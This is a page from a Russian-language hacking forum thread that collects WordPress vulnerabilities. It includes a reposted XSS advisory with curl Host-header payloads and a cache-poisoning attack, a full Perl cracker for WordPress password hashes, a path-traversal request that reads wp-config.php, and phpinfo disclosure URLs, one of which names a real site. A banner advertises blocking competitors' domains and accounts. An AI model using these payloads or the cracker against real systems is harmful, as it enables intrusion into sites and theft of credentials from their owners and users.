[ Обзор уязвимостей WordPress ]

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей WordPress ]

Страница 39 из 39

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

WordPress<=2.6.3 XSS vulnerability in RSS Feed Generator

29.11.2008, 01:31

M4g

Участник форума

Регистрация: 08.05.2007

Сообщений: 164

С нами: 10005506

Репутация: 784

WordPress<=2.6.3 XSS vulnerability in RSS Feed Generator

Цитата:

===== noXSS.org Security Advisory ======

Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith <jr (at) noxss (dot) org [email concealed]>
Published: 2008/11/25
Affected: WordPress < 2.6.5

Summary
=======

WordPress prior to v2.6.3 fails to sanitize the Host header variable
correctly when generating RSS feeds and is therefore prune to XSS
attacks.

Web Sites running in a name based virtual hosting setup are not
affected as long as they are not the default virtual host.
Moreover we only found installations running on the Apache web server
to be affected.

Vulnerability Details
=====================

The function self_link() in wp-includes/feed.php is used to generate
absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds:

function self_link() {
echo 'http'
. ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'
. $_SERVER['HTTP_HOST']
. wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);
}

The function does not sanitize the HTTP_HOST variable in any way but
WordPress replaces all $_SERVER variables with escaped ones in
wp-settings.php:

$_SERVER = add_magic_quotes($_SERVER);

In almost all setups add_magic_quotes() runs
mysql_real_escape_string() over the elements and returns the modified
array. Unfortunately this escaping method is not safe in markup
context.

PoC
====

The Apache web server only disallows '/', '\' and '..' within the host
header. The header can therefore contain markup making the following
PoC possible:

curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.org/blog/feed

The given example request will return (without additional newlines):

-- snip --
...
<atom:link href="http://\">
<body onload=alert(String.fromCharCode(88,83,83))>
/blog/feed" rel="self" type="application/rss+xml" />
...
-- snip --

The embedded JavaScript will be executed in Firefox 3.0.4 due to the
triggered switch to Quirks mode.

Exploit
=======

The following exploit is a semi-stored XSS attack and has been tested
with the following setup:

- Apache 2.x with IP based virtual hosting
- Wordpress 2.6.3 installed in /blog/
- WP Super Cache 0.84
- Firefox 3.0.4

WP Super Cache is a popular WordPress plugin that adds static file
caching to WordPress. It greatly increases performance and is
often used. It saves generated pages in the wp-content/cache directory
and adds mod_rewrite rules to serve cached pages statically.

Issuing a malicious request to a vulnerable WordPress installation
will lead to a file containing the XSS to be generated and placed
within the document root.

Request:
curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.org/blog/feed

Generated file:
http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even tough the feed is
XML because the file is served as text/html.

The only missing the step is the calculation cached file's MD5 sum.

The following code generates the MD5 checksum:

php -r 'echo md5("\"><body
onload=alert(String.fromCharCode(88,83,83))>".
"/blog/feed"), "\n";'

In the default setup the MD5 sum can be generated by concatenating the
contents of HTTP_HOST and REQUEST_URI resulting in
0d2ca4617758433a7864d57493be2c5b for the given example.

This file can be accessed until the cache expiration mechanism removes
it. The default expire time is 3600 seconds.

Vendor Response
===============
2008-11-17 Reported to vendor
2008-11-17 Initial response from vendor
2008-11-25 Release of version 2.6.5

http://www.securityfocus.com/archive/1/498652

𝕏 Twitter Reddit Telegram Копировать ссылку

Wordpress 2.7 PasswordHash Attack Tool

22.12.2008, 22:00

Fugitif

Постоянный

Регистрация: 23.09.2007

Сообщений: 416

С нами: 9806786

Репутация: 869

Wordpress 2.7 PasswordHash Attack Tool

Wordpress 2.7 PasswordHash Attack Tool

Код:

#################################################################
#Wordpress 2.7 PasswordHash Attack Tool
#It is based in "Portable PHP password hashing framework"
#for Wordpress 2.7
#Autor: netsoul
#Thanks to Waraxe and m1cr0n
#Contact: netsoul2[at]gmail.com
#ALTO PARANA - PARAGUAY
#################################################################

#! /usr/bin/perl -w
use strict;
use Digest::MD5 qw(md5 md5_hex);
use List::Util qw(min);

my $hashP = '$P$BS5/b7lxp4t.0j1ZFTyRcdrvAyxh5R0'; # 12345
my $dictionary = 'mydic.txt'; # Put a dictionary
my $php_version = '5'; # Don't modify if you don't know it

open (f1, "<$dictionary") || die "Error in open file!.\n";
    $hashP =~ m{^(\$P\$[/a-zA-Z0-9.]+)};
    die "Bad hash!\n" if length($1) != 34;
    my ($itoa64) = join('', my @itoa64 =
('.','/','0'..'9','A'..'Z','a'..'z'));
    my ($salt, $hash)=$hashP=~m/^(.{0,12})(.+)/;
    my ($header)=$salt=~m/^(.{0,3})/;
    while (<f1>) {
    chomp($_);
    print "Current Password: $_\r";
    my $found = &finder($_,$salt,$hash);
    print "\nPassword FOUND: $_" and last if $found;
    print "\nPassword NOT FOUND:" if eof;
    }
close f1;

sub b64{
    my $input = $_[0];
    my @input = split(//,$input);
    my $count = $_[1];
    my $output = '';
    my $i;
    do {
    my $value = ord($input[$i++]);
    $output .= $itoa64[$value & 0x3f];
    if ($i < $count){
        $value |= ord($input[$i]) << 8;
    }
    $output .= $itoa64[($value >> 6) & 0x3f];
    if ($i++ >= $count){
        return $output;
    }
    if ($i < $count){
        $value |= ord($input[$i]) << 16;
    }
    $output .= $itoa64[($value >> 12) & 0x3f];
    return $output if $i++ >= $count;
    $output .= $itoa64[($value >> 18) & 0x3f];
    } while ($i < $count);
    return $output;
}

sub EncryptP{
    my $password = $_[0];
    my $setting = $_[1];
    my @setting = split(//,$setting);
    my $hash;
    my $output = '*0';
    $output = '*1' if substr($setting, 0, 2) eq $output;
    return $output if substr($setting, 0, 3) ne $header;
    my $count_log2 = index($itoa64, $setting[3]);
    if ($count_log2 < 7 || $count_log2 > 30){
    return $output;}
    my $count = 1 << $count_log2;
    my $salt = substr($setting, 4, 8);
    return $output if length($salt) != 8;
    if ($php_version >= '5') {
    $hash = md5($salt . $password);
    do {
        $hash = md5($hash . $password);
    } while (--$count);

    } else {
    $hash = pack('H*', md5_hex($salt . $password));
    do {
        $hash = pack('H*', md5_hex($hash . $password));
        } while (--$count);
    }
    $output = substr($setting, 0, 12);
    $output .= &b64($hash, 16);
    return $output;
}

sub HashP{
    my $password = $_[0];
    my $salt = $_[1];
    my $hash;
    $hash = &EncryptP($password,$salt);
    return $hash if length($hash) == 34;
}

sub CheckP{
    my $password = $_[0];
    my $stored_hash = $_[1];
    my $hash = &EncryptP($password,$stored_hash);
    return $hash;
}

sub finder{
    my $password = $_[0];
    my $salt = $_[1];
    my $hash = $_[2];
    my $output = &CheckP($password,&HashP($password,$salt));
    return $output eq $salt.$hash;
}

WordPress Plugin [jRSS Widget] File Disclosure Vulnerability

30.05.2010, 12:32

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

С нами: 9428066

Репутация: 1668

Отправить сообщение для RulleR с помощью Yahoo

WordPress Plugin [jRSS Widget] File Disclosure Vulnerability

Plugin name: jRSS Widget (download)
Version: 1.0

File Disclosure

Vuln file: /wp-content/plugins/jrss-widget/proxy.php

PHP код:


		
			
header('Content-type: application/xml');

$handle = fopen($_REQUEST['url'], "r");



if ( $handle ) {

    while ( !feof($handle) ) {

        $buffer = fgets($handle, 4096);

        echo $buffer;

    }

    fclose($handle);

}

Exploit:

Код:

POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

url=../../../wp-config.php

__________________
Avant que l'ombre...

Последний раз редактировалось RulleR; 30.05.2010 в 12:34..

06.06.2010, 03:51

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

С нами: 9000386

Репутация: 1148

Плагин WP Auctions

Version: 1.7.4
Last Updated: 2010-6-5

Узнаем версию вордпрес + phpinfo().

/wp-content/plugins/wp-auctions/wp_auctions.php

PHP код:


		
			
/*...*/

if (strstr($_SERVER['PHP_SELF'],PLUGIN_EXTERNAL_PATH.PLUGIN_NAME) && isset($_GET['debug'])):

   echo "Version Number: ".$wpa_version;

   echo "<p>";

   phpinfo();

endif;

/*...*/

Результат:
http://[host]/wp-content/plugins/wp-auctions/wp_auctions.php?debug

http://smarz1000.com/wp-content/plugins/wp-auctions/wp_auctions.php?debug

Еще версия вордпрес снизу:
http://[host]/wp-content/plugins/wp-auctions/wp_auctions.php?rss

Пути:
http://[host]/wp-content/plugins/wp-auctions/wpa_resizer.php?image=/

Еще раз пути в файле:
http://smarz1000.com/wp-content/plugins/wp-auctions/wp_auctions.php?rss

Последний раз редактировалось Strilo4ka; 06.06.2010 в 04:02..

Страница 39 из 39

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов	it's my	Веб-уязвимости	361	24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ]	[53x]Shadow	Веб-уязвимости	43	04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ]	_kREveDKo_	Веб-уязвимости	20	01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ	nike57	Уязвимости Mail-сервис	4	05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов	markel	Уязвимости Mail-сервис	3	12.09.2005 10:07

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules